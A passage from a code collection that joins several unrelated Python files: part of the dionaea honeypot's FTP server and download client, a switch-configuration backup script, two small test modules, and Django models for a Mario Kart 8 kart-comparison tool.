            logger.warn("dtp state %s %s:%i <-> %s:%i!" %
                        (self.dtp.status,
                         self.dtp.remote.host, self.dtp.remote.port,
                         self.dtp.local.host, self.dtp.local.port))
    def ftp_RETR(self, p=None):
        """RETR <path>: send a file over the data connection."""
        if not p:
            # BUG FIX: RETR was an undefined name, not the string 'RETR'
            return (SYNTAX_ERR_IN_ARGS, 'RETR')
        name = self.real_path(p)
        if not name.startswith(self.basedir):
            return (PERMISSION_DENIED, p)
        if os.path.exists(name) and os.path.isfile(name):
            if self.dtp is not None and self.dtp.status == 'established':
                self.reply(FILE_STATUS_OK_OPEN_DATA_CNX)
                self.dtp.send_file(name)
            else:
                self._log_dtp_state()
        else:
            return (FILE_NOT_FOUND, p)
    def ftp_STOR(self, p=None):
        """STOR <path>: receive an uploaded file over the data connection."""
        if not p:
            # BUG FIX: STOR was an undefined name, not the string 'STOR'
            return (SYNTAX_ERR_IN_ARGS, 'STOR')
        file = self.real_path(p)
        if os.path.exists(file):
            # never overwrite existing files
            return (PERMISSION_DENIED, p)
        if not file.startswith(self.basedir):
            return (PERMISSION_DENIED, p)
        if self.dtp is not None and self.dtp.status == 'established':
            self.reply(FILE_STATUS_OK_OPEN_DATA_CNX)
            self.dtp.recv_file(file)
        else:
            self._log_dtp_state()
    def ftp_TYPE(self, t):
        """TYPE <code>: only binary ('I') transfers are supported."""
        if t == 'I':
            return (TYPE_SET_OK, 'I')
        else:
            return (CMD_NOT_IMPLMNTD_FOR_PARAM, t)
    def ftp_LIST(self, p=None):
        """LIST [path]: stream a unix-style directory listing."""
        name = self.real_path(p)
        if not name.startswith(self.basedir):
            return (FILE_NOT_FOUND, p)
        if os.path.exists(name):
            if self.dtp is not None and self.dtp.status == 'established':
                self.reply(FILE_STATUS_OK_OPEN_DATA_CNX)
                # strip the listed directory prefix from each entry
                self.dtp.send_list(name, len(name)+1)
            else:
                self._log_dtp_state()
        else:
            return (PERMISSION_DENIED, p)
    def ftp_PWD(self):
        return (PWD_REPLY, self.cwd)
    def ftp_CWD(self, p):
        """CWD <path>: change working directory (confined to basedir)."""
        cwd = self.real_path(p)
        if not cwd.startswith(self.basedir):
            return (FILE_NOT_FOUND, p)
        else:
            # store the path relative to the chroot
            self.cwd = cwd[len(self.basedir):]
            if self.cwd == "":
                self.cwd = "/"
        if os.path.exists(cwd) and os.path.isdir(cwd):
            return REQ_FILE_ACTN_COMPLETED_OK
        else:
            return (PERMISSION_DENIED, p)
    def ftp_PBSZ(self, arg):
        # protection buffer size (RFC 2228) - accepted and ignored
        return CMD_OK
    def ftp_SYST(self):
        return NAME_SYS_TYPE
    def ftp_SIZE(self, p=None):
        """SIZE <path>: report the size of a regular file."""
        if not p:
            return (FILE_NOT_FOUND,p)
        file = self.real_path(p)
        if not file.startswith(self.basedir):
            return (FILE_NOT_FOUND, p)
        if os.path.exists(file) and os.path.isfile(file):
            return (FILE_STATUS, str(stat(file).st_size))
        return (FILE_NOT_FOUND,p)
    def ftp_MDTM(self, p=None):
        """MDTM <path>: report a file's mtime as YYYYMMDDhhmmss (UTC)."""
        if not p:
            return (FILE_NOT_FOUND,p)
        file = self.real_path(p)
        if not file.startswith(self.basedir):
            return (FILE_NOT_FOUND, p)
        if os.path.exists(file) and os.path.isfile(file):
            return (FILE_STATUS, time.strftime('%Y%m%d%H%M%S', time.gmtime(stat(file).st_mtime)))
        return (FILE_NOT_FOUND,p)
    def ftp_RMD(self, p=None):
        """RMD <path>: remove an (empty) directory."""
        if not p:
            return (FILE_NOT_FOUND,p)
        dir = self.real_path(p)
        if not dir.startswith(self.basedir):
            return (FILE_NOT_FOUND, p)
        if os.path.exists(dir) and os.path.isdir(dir):
            os.rmdir(dir)
            return REQ_FILE_ACTN_COMPLETED_OK
        return (FILE_NOT_FOUND,p)
    def ftp_MKD(self, p=None):
        """MKD <path>: create a directory."""
        if not p:
            return (FILE_NOT_FOUND,p)
        dir = self.real_path(p)
        if not dir.startswith(self.basedir):
            return (FILE_NOT_FOUND, p)
        if os.path.isdir(dir):
            return (PERMISSION_DENIED, p)
        os.mkdir(dir)
        return REQ_FILE_ACTN_COMPLETED_OK
    def handle_error(self, err):
        pass
    def handle_disconnect(self):
        # tear down any data channel tied to this control connection
        if self.dtf:
            self.dtf.close()
            self.dtf = None
        if self.dtp:
            self.dtp.close()
            self.dtp = None
        return 0
def encodeHostPort(host, port):
    """Render *host*/*port* in the h1,h2,h3,h4,p1,p2 form used by PORT/PASV."""
    parts = host.split('.')
    parts.append(str(port >> 8))
    parts.append(str(port & 0xff))
    return ','.join(parts)
from os import stat
from stat import *
import time
import io
class ftpdatacon(connection):
    """Base class for FTP data channels (shared by active and passive mode).

    Streams directory listings, sends files in 1 KiB chunks and receives
    uploads; tells the owning control connection when a transfer ends.
    """
    def __init__ (self, ctrl=None):
        connection.__init__(self,'tcp')
        self.ctrl = ctrl      # owning ftpd control connection
        self.mode = None      # None | 'list' | 'file' | 'recv_file'
    def handle_error (self, err):
        if self.ctrl:
            self.ctrl.reply(CANT_OPEN_DATA_CNX)
    def send_list(self, p, rm):
        """Send an 'ls -l' style listing of path *p*.

        *rm* is the number of leading characters stripped from each
        entry's absolute path so only the name relative to *p* is shown.
        """
        def ls(f, r):
            # build one unix-style listing line for path f
            logger.debug("stat %s" % f)
            name = f[r:]
            s=stat(f)
            size = s.st_size
            directory = S_ISDIR(s.st_mode)
            permissions = S_IMODE(s[ST_MODE])
            hardlinks = s.st_nlink
            modified = s.st_mtime
            owner = s.st_uid
            group = s.st_gid
            def formatMode(mode):
                # expand the nine permission bits to rwxrwxrwx notation
                return ''.join([mode & (256 >> n) and 'rwx'[n % 3] or '-' for n in range(9)])
            def formatDate(mtime):
                # recent files show hh:mm, files from other years show the year
                now = time.gmtime()
                info = {
                    'month': mtime.tm_mon,
                    'day': mtime.tm_mday,
                    'year': mtime.tm_year,
                    'hour': mtime.tm_hour,
                    'minute': mtime.tm_min
                }
                if now.tm_year != mtime.tm_year:
                    return '%(month)s %(day)02d %(year)5d' % info
                else:
                    return '%(month)s %(day)02d %(hour)02d:%(minute)02d' % info
            format = ('%(directory)s%(permissions)s%(hardlinks)4d '
                      '%(owner)-9s %(group)-9s %(size)15d %(date)12s '
                      '%(name)s')
            return format % {
                'directory': directory and 'd' or '-',
                'permissions': formatMode(permissions),
                'hardlinks': hardlinks,
                'owner': owner,
                'group': group,
                'size': size,
                'date': formatDate(time.gmtime(modified)),
                'name': name}
        self.mode = 'list'
        # initialize so a path that is neither dir nor file yields an
        # empty (but defined) listing instead of an AttributeError
        self.data = []
        if os.path.isdir(p):
            self.data = [ls(os.path.join(p,f), rm) for f in os.listdir(p)]
        elif os.path.isfile(p):
            # BUG FIX: ls() takes two arguments; strip the directory part
            # so the single file is listed by its basename
            self.data = [ls(p, p.rfind('/') + 1)]
        logger.debug("p %s len %i" % (p, len(self.data)) )
        if len(self.data) > 0:
            self.off = 0
            self.off = self.off + 1
            self.send(self.data[self.off-1] + '\r\n')
        else:
            self.close()
            if self.ctrl:
                self.ctrl.dtp = None
                self.ctrl.reply(TXFR_COMPLETE_OK)
    def recv_file(self, p):
        """Start receiving an uploaded file into path *p*."""
        logger.debug(p)
        self.mode = 'recv_file'
        self.file = io.open(p, 'wb+')
    def send_file(self, p):
        """Start streaming file *p* to the peer in 1 KiB chunks."""
        self.mode = 'file'
        self.file = io.open(p, 'rb')
        w = self.file.read(1024)
        self.send(w)
        if len(w) < 1024:
            # the whole file fit into the first chunk
            self.file.close()
            self.mode = None
            self.close()
            if self.ctrl:
                self.ctrl.reply(TXFR_COMPLETE_OK)
                self.ctrl.dtp = None
    def handle_io_in(self, data):
        if self.mode == "recv_file":
            self.file.write(data)
        return len(data)
    def handle_io_out(self):
        """Send buffer drained: push the next listing line / file chunk."""
        logger.debug("io_out")
        if self.mode == 'list':
            if self.off < len(self.data):
                self.off = self.off + 1
                self.send(self.data[self.off - 1] + '\r\n')
            else:
                self.close()
                if self.ctrl:
                    self.ctrl.dtp = None
                    self.ctrl.reply(TXFR_COMPLETE_OK)
        elif self.mode == 'file':
            w = self.file.read(1024)
            self.send(w)
            if len(w) < 1024:
                self.mode = None
                self.close()
                self.file.close()
                if self.ctrl:
                    self.ctrl.dtp = None
                    self.ctrl.reply(TXFR_COMPLETE_OK)
    def handle_disconnect(self):
        # detach from the control connection and close any open file
        if self.ctrl:
            if self.ctrl.dtf:
                self.ctrl.dtf = None
            if self.ctrl.dtp:
                self.ctrl.dtp = None
            if self.mode == 'file' and self.file:
                self.file.close()
            if self.mode == 'recv_file' and self.file:
                self.file.close()
            self.ctrl.reply(TXFR_COMPLETE_OK)
        return 0
    def handle_origin(self, parent):
        pass
class ftpdataconnect(ftpdatacon):
    """Active-mode (PORT) data channel: the server connects out to the client."""
    def __init__(self, host, port, ctrl):
        ftpdatacon.__init__(self, ctrl)
        self.connect(host, port)
    def handle_established(self):
        # acknowledge the PORT command once the outbound connect succeeded
        logger.debug("DATA connection established")
        self.ctrl.reply(ENTERING_PORT_MODE)
class ftpdatalisten(ftpdatacon):
    """Passive-mode (PASV) data channel: listens for the client to connect."""
    def __init__ (self, host=None, port=None, ctrl=None):
        ftpdatacon.__init__(self,ctrl)
        if host is not None:
            self.bind(host,port)
            self.listen(1)
        # BUG FIX: ctrl defaults to None - guard before dereferencing
        if ctrl is not None and ctrl.limits:
            self._out.throttle = ctrl.limits['_out']
    def handle_established(self):
        logger.debug("DATA connection established")
    def handle_origin(self, parent):
        """An accepted connection replaces the listener as the control's dtp."""
        ftpdatacon.handle_origin(self,parent)
        logger.debug("Meeting parent")
        self.ctrl = parent.ctrl
        self.ctrl.dtp = self
        self.ctrl.dtf = None
        # the listener is no longer needed once the peer connected
        parent.ctrl = None
        parent.close()
# ftp client
import re
import random
# splits a control-channel buffer into lines, accepting bare "\n" as well as "\r\n"
_linesep_regexp = re.compile(b"\r?\n")
class ftpctrl(connection):
    """FTP client control channel for the download helper (class ftp).

    Walks a fixed state machine driven by numeric reply codes:
    NONE -> USER -> PASS -> (TYPE) -> PORT -> RETR -> QUIT.
    """
    def __init__(self, ftp):
        connection.__init__(self, 'tcp')
        self.ftp = ftp
        self.state = 'NONE'
        # allow up to a minute of sustained server silence
        self.timeouts.sustain = 60
    def handle_established(self):
        logger.debug("FTP CTRL connection established")
    def handle_io_in(self, data):
        # Process complete reply lines only; return the number of bytes
        # consumed so a partial trailing line stays buffered.
        dlen = len(data)
        lines = _linesep_regexp.split(data)#.decode('UTF-8'))
        remain = lines.pop()
        dlen = dlen - len(remain)
        for line in lines:
            logger.debug("FTP LINE: " + str(line))
            # c: 3-digit reply code; s == b'-' marks a multi-line reply
            # continuation which must not advance the state machine
            c = int(line[:3])
            s = line[3:4]
            if self.state == 'NONE':
                if c == 220 and s != b'-':
                    self.cmd('USER ' + self.ftp.user)
                    self.state = 'USER'
            elif self.state == 'USER' or self.state == 'PASS':
                if self.state == 'USER' and c == 331 and s != b'-':
                    self.cmd('PASS ' + self.ftp.passwd)
                    self.state = 'PASS'
                if c == 230 and s != b'-':
                    # logged in; binary mode needs an extra TYPE round-trip
                    if self.ftp.mode == 'binary':
                        self.cmd('TYPE I')
                        self.state = 'TYPE'
                    else:
                        port = self.ftp.makeport()
                        self.cmd('PORT ' + port)
                        self.state = 'PORT'
            elif self.state == 'TYPE':
                if (c >= 200 and c < 300) and s != b'-':
                    port = self.ftp.makeport()
                    self.cmd('PORT ' + port)
                    self.state = 'PORT'
            elif self.state == 'PORT':
                if c == 200 and s != b'-':
                    self.cmd('RETR ' + self.ftp.file)
                    self.state = 'RETR'
                else:
                    logger.warn("PORT command failed")
            elif self.state == 'RETR':
                if (c > 200 and c < 300) and s != b'-':
                    self.cmd('QUIT')
                    self.state = 'QUIT'
                    self.ftp.ctrldone()
        return dlen
    def cmd(self, cmd):
        """Send one FTP command line to the server."""
        logger.debug("FTP CMD: '" + cmd +"'")
        self.send(cmd + '\r\n')
    def handle_error(self, err):
        self.ftp.fail()
        return False
    def handle_disconnect(self):
        # a disconnect before QUIT means the transfer did not complete
        if self.state != 'QUIT':
            self.ftp.fail()
        return False
    def handle_timeout_idle(self):
        return False
    def handle_timeout_sustain(self):
        return False
class ftpdata(connection):
    """FTP client data channel: spools the downloaded file into a tempfile."""
    def __init__(self, ftp=None):
        connection.__init__(self, 'tcp')
        self.ftp = ftp
        # give the remote end 10s to connect to our PORT listener
        self.timeouts.listen = 10
    def handle_established(self):
        logger.debug("FTP DATA established")
        self.timeouts.idle = 30
        # spool incoming data into dionaea's configured download directory
        self.fileobj = tempfile.NamedTemporaryFile(delete=False, prefix='ftp-', suffix=g_dionaea.config(
        )['downloads']['tmp-suffix'], dir=g_dionaea.config()['downloads']['dir'])
    def handle_origin(self, parent):
        # an accepted connection replaces the listener
        self.ftp = parent.ftp
        self.ftp.dataconn = self
        self.ftp.datalistener.close()
        self.ftp.datalistener = None
    def handle_io_in(self, data):
        self.fileobj.write(data)
        return len(data)
    def handle_timeout_idle(self):
        # transfer stalled: drop the partial download
        # NOTE(review): NamedTemporaryFile objects do not normally expose
        # .unlink(); this likely relies on a wrapper attribute - confirm
        # against the runtime in use.
        self.fileobj.unlink(self.fileobj.name)
        self.fileobj = None
        self.ftp.fail()
        return False
    def handle_disconnect(self):
        logger.debug("received %i bytes" %(self._in.accounting.bytes))
        if hasattr(self, 'fileobj')and self.fileobj != None:
            # report the completed download, then remove the spool file
            self.fileobj.close()
            icd = incident("dionaea.download.complete")
            icd.path = self.fileobj.name
            icd.con = self.ftp.con
            icd.url = self.ftp.url
            icd.report()
            self.fileobj.unlink(self.fileobj.name)
            self.ftp.dataconn = None
            self.ftp.datadone()
        return False
    def handle_timeout_listen(self):
        # nobody connected to the data port in time
        self.ftp.fail()
        return False
class ftp:
    """Active-mode FTP download client used to fetch remote files.

    Drives a ftpctrl control connection plus a ftpdata data connection
    and reports the finished download as an incident.
    """
    def __init__(self):
        self.ctrl = ftpctrl(self)
    def download(self, con, user, passwd, host, port, file, mode, url):
        """Start downloading *file* from *host*:*port* via active FTP."""
        self.user = user
        self.passwd = passwd
        self.host = host
        self.port = port
        self.file = file
        self.mode = mode
        self.con = con
        self.url = url
        if con:
            # bind near the triggering connection so NATed setups work
            self.local = con.local.host
            self.ctrl.bind(self.local, 0)
            self.con.ref()
        self.ctrl.connect(host, port)
        self.dataconn = None
        self.datalistener = None
        if con:
            i=incident("dionaea.connection.link")
            i.parent = con
            i.child = self.ctrl
            i.report()
    def makeport(self):
        """Open the data listener and return the PORT command argument for it."""
        self.datalistener = ftpdata(ftp=self)
        try:
            portrange = g_dionaea.config()['modules']['python'][
                'ftp']['active-ports']
            (minport, maxport) = portrange.split('-')
            minport = int(minport)
            maxport = int(maxport)
        except Exception:
            # missing/malformed config: fall back to a sane default range
            # (the old bare `except:` also swallowed KeyboardInterrupt)
            minport = 62001
            maxport = 63000
        try:
            # for NAT setups
            host = g_dionaea.config()['modules']['python'][
                'ftp']['active-host']
            if host == '0.0.0.0':
                host = self.ctrl.local.host
                logger.info("datalisten host %s" % host)
            else:
                import socket
                host = socket.gethostbyname(host)
                logger.info("resolved host %s" % host)
        except Exception:
            host = self.ctrl.local.host
            logger.info("except datalisten host %s" % self.ctrl.local.host)
        # NAT, use a port range which is forwarded to your honeypot
        ports = list(
            filter(lambda port: ((port >> 4) & 0xf) != 0, range(minport, maxport)))
        random.shuffle(ports)
        port = None
        for port in ports:
            self.datalistener.bind(self.ctrl.local.host, port)
            if self.datalistener.listen() == True:
                port = self.datalistener.local.port
                i=incident("dionaea.connection.link")
                i.parent = self.ctrl
                i.child = self.datalistener
                i.report()
                break
        hbytes = host.split('.')
        pbytes = [repr(port//256), repr(port%256)]
        # h1,h2,h3,h4,p1,p2 as expected by the PORT command
        # (renamed from `bytes` which shadowed the builtin)
        portspec = ','.join(hbytes + pbytes)
        logger.debug("PORT CMD %s" % (portspec))
        return portspec
    def ctrldone(self):
        """Control channel finished (QUIT acknowledged)."""
        logger.info("SUCCESS DOWNLOADING FILE")
        self.done()
    def datadone(self):
        """Data channel finished receiving the file."""
        logger.info("FILE received")
        self.done()
    def done(self):
        # only proceed once BOTH channels are finished
        if self.ctrl and self.ctrl.state == 'QUIT' and self.dataconn == None:
            logger.info("proceed processing file!")
            self.ctrl = None
            self.finish()
    def fail(self):
        self.finish()
    def finish(self):
        """Release every reference and connection held by this download."""
        if self.con:
            self.con.unref()
            self.con = None
        if self.ctrl != None:
            self.ctrl.close()
            self.ctrl = None
        if self.datalistener != None:
            self.datalistener.close()
            self.datalistener = None
        if self.dataconn != None:
            self.dataconn.close()
            self.dataconn = None
class ftpdownloadhandler(ihandler):
    """Reacts to download incidents by fetching ftp:// URLs."""
    def __init__(self, path):
        logger.debug("%s ready!" % (self.__class__.__name__))
        ihandler.__init__(self, path)
    def handle_incident(self, icd):
        """Start an FTP download when the incident carries an ftp:// url."""
        url = icd.url
        p = urllib.parse.urlsplit(url)
        # BUG FIX: leftover debug print() replaced by logging
        logger.debug("split url: %s" % (p,))
        if p.scheme == 'ftp':
            logger.info("do download")
            try:
                con = icd.con
            except AttributeError:
                con = None
            # transfer mode defaults to binary unless the incident says otherwise
            if hasattr(icd,'ftpmode'):
                ftpmode = icd.ftpmode
            else:
                ftpmode = 'binary'
            f = ftp()
            f.download(
                con, p.username, p.password, p.hostname, p.port, p.path, ftpmode, url)
| GovCERT-CZ/dionaea | modules/python/scripts/ftp.py | Python | gpl-2.0 | 32,082 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# vim:set sw=4 ts=4 et:
import sys
import pexpect
import threading
import os
import shutil
import logging
import time
import configparser
import ast
import subprocess
def backup(switch, server):
    """Dispatch to the backup routine matching the switch's type.

    Returns the routine's status code, or 4 for an unsupported type.
    """
    kind = switch['type'].lower()
    if kind == '3com':
        return backup_3com(switch, server)
    if kind == 'hp':
        return backup_hp(switch, server)
    logging.error("Unsupported type of switch (type: %s)" % (switch['type']))
    return 4
def backup_3com(switch, server):
    """Back up the running configuration of a 3Com switch stack.

    Connects over ssh, authenticates and tells the switch to upload its
    current configuration to the TFTP *server*.
    Returns 0 on success, 1 on connection failure, 2 on authentication
    failure, 3 on backup failure (mirrors backup_hp).
    """
    ssh = None
    try:
        ssh = pexpect.spawn('ssh -o StrictHostKeyChecking=no %s@%s' % (switch['username'], switch['ip']))
        logging.debug('%s: connecting to ip: %s' % (switch['name'], switch['ip']))
        ssh.expect('password')
    except Exception:
        # BUG FIX: the old handler read ssh.before even when spawn() itself
        # failed and `ssh` was never bound (NameError inside the except)
        logging.error("Connection failed(%s)\n \t%s" % (switch['name'], ssh.before if ssh is not None else 'spawn failed'))
        return 1
    try:
        ssh.sendline('%s' % switch['password'])
        logging.debug('%s: authenticating username: %s' % (switch['name'], switch['username']))
        ssh.expect('login')
    except Exception:
        logging.error("Authorization failed(%s)\n \tusername: %s" % (switch['name'], switch['username']))
        return 2
    try:
        ssh.sendline("backup fabric current-configuration to %s %s.cfg" % (server, switch['name']))
        logging.debug('%s: backuping to server: %s' % (switch['name'], server))
        # raw string: \s is a regex character class, not a string escape
        ssh.expect(r'finished!\s+<.*>',timeout=30)
        ssh.sendline('quit')
    except Exception:
        logging.error("Backup failed(%s)\n \t%s" % (switch['name'], ssh.before))
        return 3
    logging.info("Configuration from %s uploaded to tftp server %s" % (switch['name'], server))
    return 0
def backup_hp(switch, server):
    """Back up the startup configuration of an HP switch.

    Connects over ssh, authenticates and tells the switch to upload its
    startup configuration to the TFTP *server*.
    Returns 0 on success, 1 on connection failure, 2 on authentication
    failure, 3 on backup failure (mirrors backup_3com).
    """
    ssh = None
    try:
        ssh = pexpect.spawn('ssh -o StrictHostKeyChecking=no %s@%s' % (switch['username'], switch['ip']))
        logging.debug('%s: connecting to ip: %s' % (switch['name'], switch['ip']))
        ssh.expect('password')
    except Exception:
        # BUG FIX: the old handler read ssh.before even when spawn() itself
        # failed and `ssh` was never bound (NameError inside the except)
        logging.error("Connection failed(%s)\n \t%s" % (switch['name'], ssh.before if ssh is not None else 'spawn failed'))
        return 1
    try:
        ssh.sendline('%s' % switch['password'])
        logging.debug('%s: authenticating username: %s' % (switch['name'], switch['username']))
        ssh.expect('>')
    except Exception:
        logging.error("Authorization failed(%s)\n \tusername: %s" % (switch['name'], switch['username']))
        return 2
    try:
        ssh.sendline("backup startup-configuration to %s %s.cfg" % (server, switch['name']))
        logging.debug('%s: backuping to server: %s' % (switch['name'], server))
        # raw string: \s is a regex character class, not a string escape
        ssh.expect(r'finished!\s+<.*>',timeout=30)
        ssh.sendline('quit')
    except Exception:
        logging.error("Backup failed(%s)\n \t%s" % (switch['name'], ssh.before))
        return 3
    logging.info("Configuration from %s uploaded to tftp server %s" % (switch['name'], server))
    return 0
def sws_cfg_check(sws_cfg):
    """Ensure every switch section defines all options backup() relies on.

    Raises Exception naming the first missing key and its section.
    """
    required = {'username', 'password', 'name', 'ip', 'units', 'type'}
    for section, options in sws_cfg.items():
        missing = [key for key in required if key not in options]
        if missing:
            raise Exception("Key \'%s\' in switches configuration in section \'%s\' is missing" % (missing[0], section))
def load_switches_cfg():
    """Parse conf/switches.cfg into {section: {option: value}} and validate it."""
    parser = configparser.ConfigParser()
    parser.read("%s/conf/switches.cfg" % (sys.path[0]))
    switches = {}
    for section in parser.sections():
        switches[section] = dict(parser.items(section))
    sws_cfg_check(switches)
    return switches
def app_cfg_check(app_cfg):
    """Ensure the application config provides every option the script uses.

    Raises Exception naming a missing key.
    """
    required = {'backup_dir_path', 'backup_server', 'file_expiration_timeout', 'tftp_dir_path', 'log_file', 'git_autocommit'}
    for key in required:
        if key not in app_cfg:
            raise Exception("Key \'%s\' in application configuration file is missing" % (key))
def load_app_cfg():
    """Parse conf/app.cfg's [APP] section, validate it and normalize booleans."""
    parser = configparser.ConfigParser()
    parser.read("%s/conf/app.cfg" % (sys.path[0]))
    cfg = dict(parser.items('APP'))
    app_cfg_check(cfg)
    # config values arrive as strings; accept the common truthy spellings
    cfg['git_autocommit'] = cfg['git_autocommit'].lower() in ['true', '1', 'yes', 'y']
    return cfg
def git_autocommit(app_cfg):
    """Stage and commit every change inside the backup directory.

    NOTE(review): backup_dir_path is interpolated into a shell command;
    the configuration is assumed trusted (a hostile path could inject
    shell commands).
    """
    shell_cmd = "cd %s; git add -A; git commit -a -m 'autocommit on change'" % (app_cfg['backup_dir_path'])
    subprocess.Popen(shell_cmd, stdout=subprocess.PIPE, shell=True)
def main():
    """Back up all configured switches in parallel, then collect the results.

    Workflow: read app + switch configuration, spawn one backup thread per
    switch, wait for completion, copy fresh files out of the TFTP directory
    into the backup directory, then optionally git-commit the changes.
    """
    app_cfg = load_app_cfg()
    logging.basicConfig(filename=app_cfg['log_file'], level=logging.INFO, format='%(asctime)s %(levelname)s %(message)s')
    switches_cfg = load_switches_cfg()
    threads = []
    # one worker thread per switch; backup() dispatches on switch type
    for switch in switches_cfg:
        t = threading.Thread(target = backup, args = (switches_cfg[switch], app_cfg['backup_server']))
        t.start()
        threads.append(t)
    for t in threads:
        t.join()
    end_time = time.time()
    file_expiration_timeout = int(app_cfg['file_expiration_timeout'])
    for section in switches_cfg:
        switch = switches_cfg[section]
        if switch['type'].lower() == '3com':
            # 3Com stacks upload one file per unit: <name>_<unit>.cfg
            units = ast.literal_eval(switch['units'])
            for unit in units:
                tmp_file_path = "%s/%s_%d.cfg" % (app_cfg['tftp_dir_path'],switch['name'],unit)
                if not os.access(tmp_file_path, os.R_OK):
                    logging.warning("Fail to read %s unit %d, expected file %s" % (switch['name'],unit,tmp_file_path))
                elif (end_time - os.stat(tmp_file_path).st_mtime) > file_expiration_timeout:
                    # stale file from an earlier run - do not archive it
                    logging.error("Configuration of %s unit %d, file %s is older than %d s, file will be ignored" % (switch['name'],unit,tmp_file_path, file_expiration_timeout))
                else:
                    shutil.copy2(tmp_file_path, app_cfg['backup_dir_path'])
                    logging.info("Saved %s unit %d configuration" % (switch['name'],unit))
        elif switch['type'].lower() == 'hp':
            # HP switches upload a single <name>.cfg
            tmp_file_path = "%s/%s.cfg" % (app_cfg['tftp_dir_path'],switch['name'])
            if not os.access(tmp_file_path, os.R_OK):
                logging.warning("Fail to read %s, expected file %s" % (switch['name'],tmp_file_path))
            elif (end_time - os.stat(tmp_file_path).st_mtime) > file_expiration_timeout:
                logging.error("Configuration of %s, file %s is older than %d s, file will be ignored" % (switch['name'],tmp_file_path, file_expiration_timeout))
            else:
                shutil.copy2(tmp_file_path, app_cfg['backup_dir_path'])
                logging.info("Saved %s configuration" % (switch['name']))
    if app_cfg['git_autocommit'] is True:
        git_autocommit(app_cfg)
    return 0
# Script entry point: run all backups once and exit.
if __name__ == '__main__':
    main()
| brabemi/sw_config_backup | sw_config_backup.py | Python | gpl-2.0 | 5,888 |
from chimera.core.chimeraobject import ChimeraObject
from chimera.core.manager import Manager
from chimera.core.exceptions import ChimeraException
from nose.tools import assert_raises
import chimera.core.log
import logging
log = logging.getLogger("chimera.test_log")
class TestLog (object):
    """Exercises chimera's logging of chained (caused) exceptions."""
    def test_log (self):
        class Simple (ChimeraObject):
            def __init__ (self):
                ChimeraObject.__init__(self)
            def answer (self):
                # raise, log the caught exception, then raise a fresh one so
                # the proxy layer can attach the original as its cause
                try:
                    raise ChimeraException("I'm an Exception, sorry.")
                except ChimeraException:
                    self.log.exception("from except: wow, exception caught.")
                    raise ChimeraException("I'm a new Exception, sorry again")
        manager = Manager()
        manager.addClass(Simple, "simple")
        simple = manager.getProxy(Simple)
        try:
            simple.answer()
        # NOTE: Python 2 except syntax - this module predates Python 3
        except ChimeraException, e:
            # the re-raised exception must carry the original as its cause
            assert e.cause != None
            log.exception("wow, something wrong")
        manager.shutdown()
| wschoenell/chimera_imported_googlecode | src/chimera/core/tests/test_log.py | Python | gpl-2.0 | 1,086 |
from .__meta__ import *
from tracer.resources.processes import Processes, Process
from tracer.resources.collections import ProcessesCollection
import os
import subprocess
@unittest.skipIf(True, "@TODO Create Mock for Processes class")
class TestProcesses(unittest.TestCase):
    """Tests for tracer's process model (currently skipped pending mocks)."""
    def test_children(self):
        # children() must return the project's collection type of Process objects
        process = Processes.all()[0]
        children = process.children()
        self.assertIsInstance(children, ProcessesCollection)
        for child in children:
            self.assertIsInstance(child, Process)
    def test_unique_process(self):
        # Process instances are cached per-pid until the cache is reset
        process = Process(os.getpid())
        parent = Process(os.getppid())
        self.assertIs(process, Process(os.getpid()))
        self.assertIs(parent, process.parent())
        self.assertIn(process, parent.children())
        Process.reset_cache()
        # after a reset: equal by value but a distinct object
        process2 = Process(os.getpid())
        self.assertEqual(process, process2)
        self.assertIsNot(process, process2)
    def test_process_caching(self):
        process = Process(os.getpid())
        # Populate the cache entry for children
        process.children()
        child = subprocess.Popen(os.sys.executable, stdin=subprocess.PIPE)
        # the cached view must not see the new child until rebuild_cache()
        self.assertEqual(0, len(process.children()))
        process.rebuild_cache()
        self.assertEqual(1, len(process.children()))
        child.terminate()
| sean797/tracer | tests/test_processes.py | Python | gpl-2.0 | 1,199 |
"""Django models for MK8 Kart Comparison Tool."""
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
from django.templatetags.static import static
import re
import uuid
import logging
from ipware.ip import get_ip, get_real_ip
logger = logging.getLogger(__name__)
class KartComponent(models.Model):
    """Abstract model for all kart components.

    Base class for every concrete component model; carries the display
    name plus helpers shared by all components.
    """
    # display name; blank allowed so placeholder rows can exist
    name = models.CharField(max_length=30, blank=True)
    def __unicode__(self):
        """Return the component name."""
        return self.name
    def file(self):
        """Return a lowercase form of the name used for image filenames."""
        # strip every non-alphanumeric character (unicode-aware),
        # e.g. "Mr. Scooty" -> "mrscooty"
        return re.sub(ur'[\W_]+', u'', self.name.lower(), flags=re.UNICODE)
    class Meta:
        abstract = True
        ordering = ['pk']
class CommonStats(KartComponent):
    """Common stats across all kart components.

    Each value is one component's contribution; a complete kart's stat is
    the sum over character, body, wheels and glider (see KartConfig).
    """
    # terrain-specific top-speed contributions
    speed_ground = models.DecimalField(max_digits=3, decimal_places=2)
    speed_water = models.DecimalField(max_digits=3, decimal_places=2)
    speed_air = models.DecimalField(max_digits=3, decimal_places=2)
    speed_antigravity = models.DecimalField(max_digits=3, decimal_places=2)
    acceleration = models.DecimalField(max_digits=3, decimal_places=2)
    weight = models.DecimalField(max_digits=3, decimal_places=2)
    # terrain-specific handling contributions
    handling_ground = models.DecimalField(max_digits=3, decimal_places=2)
    handling_water = models.DecimalField(max_digits=3, decimal_places=2)
    handling_air = models.DecimalField(max_digits=3, decimal_places=2)
    handling_antigravity = models.DecimalField(max_digits=3, decimal_places=2)
    traction = models.DecimalField(max_digits=3, decimal_places=2)
    miniturbo = models.DecimalField(max_digits=3, decimal_places=2)
    class Meta:
        abstract = True
class CharacterStats(CommonStats):
    """Maps racers to the stats belonging to the 9 weight subclasses."""
    # used to order the weight subclasses for display;
    # NOTE(review): exact format presumably set by fixtures - confirm
    sort_order = models.CharField(max_length=5)
class Kart(CommonStats):
    """Stats for a kart body."""
    def file(self):
        """Return the static URL of this kart body's image."""
        return static('images/mk8/karts/%s.png' % super(Kart, self).file())
    class Meta:
        verbose_name_plural = "karts"
        ordering = ['pk']
class Wheel(CommonStats):
    """Stats for a set of kart wheels."""
    def file(self):
        """Return the static URL of this wheel set's image."""
        return static('images/mk8/wheels/%s.png' % super(Wheel, self).file())
    class Meta:
        ordering = ['pk']
class Glider(CommonStats):
    """Stats for a kart glider."""
    def file(self):
        """Return the static URL of this glider's image."""
        return static('images/mk8/gliders/%s.png' % super(Glider, self).file())
    class Meta:
        ordering = ['pk']
class Character(KartComponent):
    """Stats for a kart racer/driver."""
    # several characters share one stats row (the 9 weight subclasses)
